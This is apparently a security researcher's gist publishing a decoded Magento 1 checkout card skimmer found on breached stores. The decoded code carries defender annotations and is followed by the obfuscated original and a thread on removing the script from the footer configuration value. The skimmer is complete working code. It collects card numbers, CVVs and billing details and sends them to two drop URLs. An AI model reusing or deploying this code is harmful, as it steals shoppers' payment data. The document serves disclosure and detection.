962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
// Skimmer helper: turns a string into the concatenation of its UTF-16 code
// units, each written as exactly four hex digits. It is installed on
// String.prototype (so every string on the page gains it); the unusual name
// 'hexEncode' survives the obfuscated form below and is a usable search
// signature when sweeping page sources.
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
// left-pad to a fixed width of 4 so a decoder can split the output evenly
output += ('000' + a).slice(-4)
};
return output
};
// Encodes the stolen record before it is put on the wire. This is not
// encryption: there is no key and every step is reversible, so a payload
// captured from proxy or browser logs can be decoded offline by undoing the
// steps in reverse order: atob, split on '*', shift each number right by 3,
// String.fromCharCode, regroup into 4-hex-digit code units, atob again.
// Note that btoa() throws on any code unit above 0xFF, so a cardholder name
// with non-Latin1 characters makes this throw and the click handler that
// calls it never reaches its send.
function obfuscate(arg) {
var b64 = btoa(arg);
var b64hex = (b64.hexEncode()); // relies on the String.prototype extension above
var blob = '';
for (var i = 0; i < b64hex.length; i++) {
// each hex character's code point times 8, joined with a '*' separator
blob += (b64hex[i].charCodeAt(0) << 3) + '*'
};
var blobb64 = btoa(blob);
return blobb64
}
// Skimmer core. Hooks every element with class 'button' (judging by the
// payment[...] / billing[...] names below, the step buttons of a Magento 1
// one-page checkout) and, on click, copies whichever card and address fields
// exist on the page into a '|'-separated record. Nothing is sent unless
// payment[cc_cid] (the CVV) holds a value, so a click only triggers a send
// once card data has been typed.
// Defender notes:
//  - exfiltration is a synchronous GET with the whole record in the query
//    string, so the stolen data appears verbatim in browser network logs,
//    proxy logs and CSP violation reports; a connect-src policy that omits
//    these two hosts would have blocked both sends;
//  - both URLs are indicators of compromise. The first sits under another
//    Magento install's admin asset path, which suggests a previously
//    compromised store reused as a drop point rather than attacker-owned
//    infrastructure (not verifiable from this code alone);
//  - 'i', 'rand' and 'urll' are implicit globals; 'rand' is computed and
//    never used.
function addtoev() {
var allButtons = document.getElementsByClassName('button');
// Only buttons present when this runs are hooked; elements injected later are not.
for (i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function() {
var ccCounter = ''; // CVV; doubles as the "card data present" gate below
var serialPayload = ''; // '|'-separated record in the fixed field order below
if (document.getElementsByName('payment[cc_number]')[0]) {
serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_cid]')[0]) {
ccCounter = document.getElementsByName('payment[cc_cid]')[0].value;
serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_month]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_year]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_owner]')[0]) {
serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|'
};
if (document.getElementsByName('billing[firstname]')[0]) {
serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|'
};
if (document.getElementsByName('billing[lastname]')[0]) {
serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|'
};
if (document.getElementsByName('billing[telephone]')[0]) {
serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|'
};
if (document.getElementsByName('billing[street][]')[0]) {
serialPayload += document.getElementsByName('billing[street][]')[0].value + '|'
};
if (document.getElementsByName('billing[city]')[0]) {
serialPayload += document.getElementsByName('billing[city]')[0].value + '|'
};
if (document.getElementsByName('billing[postcode]')[0]) {
serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|'
};
if (document.getElementsByName('billing[region_id]')[0]) {
serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|'
};
if (document.getElementsByName('shipping[country_id]')[0]) {
serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|'
};
// Send only when a CVV was captured; the other fields alone are not worth the noise to the drop server.
if (ccCounter != '') {
var payloadObj = {
Domain: 'all',
d: obfuscate(serialPayload) // reversible encoding, see obfuscate()
};
rand = Math.floor((Math.random() * 1000000) + 1); // never used (perhaps an abandoned cache-buster)
// Primary drop. The base64 JSON travels in the query string, so it is logged end to end.
urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj));
var req1 = new XMLHttpRequest();
req1.open('GET', urll, false); // synchronous: the click is blocked until the send completes
req1.send(); // a network failure on a synchronous XHR throws, which would abort the handler before the second send
// Secondary drop: same payload over plain HTTP to a bare IP. On an HTTPS checkout
// this is active mixed content and current browsers block it.
urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj));
var req2 = new XMLHttpRequest();
req2.open('GET', urll, false);
req2.send()
}
})
}
}
// Entry point: installs the click hooks once, after the page's own scripts
// have run. Because it runs only at 'load', buttons rendered later by the
// checkout's AJAX steps are never hooked.
window.addEventListener('load', function() {
addtoev()
})
// Obfuscated form as found in the compromised stores (the listing above is its
// decode). Every string - DOM property names, field names and both drop URLs -
// lives in the _0xe6b4 array and is reached by index, so that array, or the
// 'hexEncode' and 'addtoev' names that survive obfuscation, is the practical
// search signature. The decoder renamed the helper 'sa' to 'obfuscate' above;
// everything else maps one-to-one.
var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ 
_0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()})
costicanu commented Jul 18, 2019

Any idea how to fix this security breach on Magento?

gwillem commented Jul 26, 2019

@costicanu They use multiple exploits to gain access to these stores. See also https://sansec.io/labs/2019/01/29/magento-module-blacklist/

temp8888 commented Jul 28, 2019

I resolved this. They insert the code into the database, not into the PHP files on disk.

In the core_config_data table, look for the row whose path is design/footer/absolute_footer; the script is stored in its value.

or

System -> Configuration -> Design -> Footer -> Miscellaneous HTML

The attackers embed the malicious script in that design/footer/absolute_footer value, padded with many lines of whitespace so it is not visible when the field is opened in the admin editor.

edit:

#File: app/code/core/Mage/Page/Block/Html.php
// Magento 1 core: returns the raw value stored under the
// design/footer/absolute_footer config path, which the footer template then
// prints as-is. That is why a script written into core_config_data under
// this path ends up running on every storefront page.
public function getAbsoluteFooter()
{
return Mage::getStoreConfig('design/footer/absolute_footer');
}

Since I don't use the absolute footer, I commented out the lookup so the stored value is never rendered:

// Stop-gap only: with the lookup commented out the method returns null, so the
// injected footer value is no longer rendered. This removes the output, not
// the payload row in core_config_data or the access that wrote it there.
public function getAbsoluteFooter()
{
#return Mage::getStoreConfig('design/footer/absolute_footer');
}

You should also run your store through https://www.magereport.com to identify the unpatched holes that let them in.

gwillem commented Jul 29, 2019

Mind you, you are battling the symptoms here, not the root cause. If people are able to write to your database, you have bigger problems: whoever planted this can just as easily write the script into another rendered config value or come back through the same entry point.
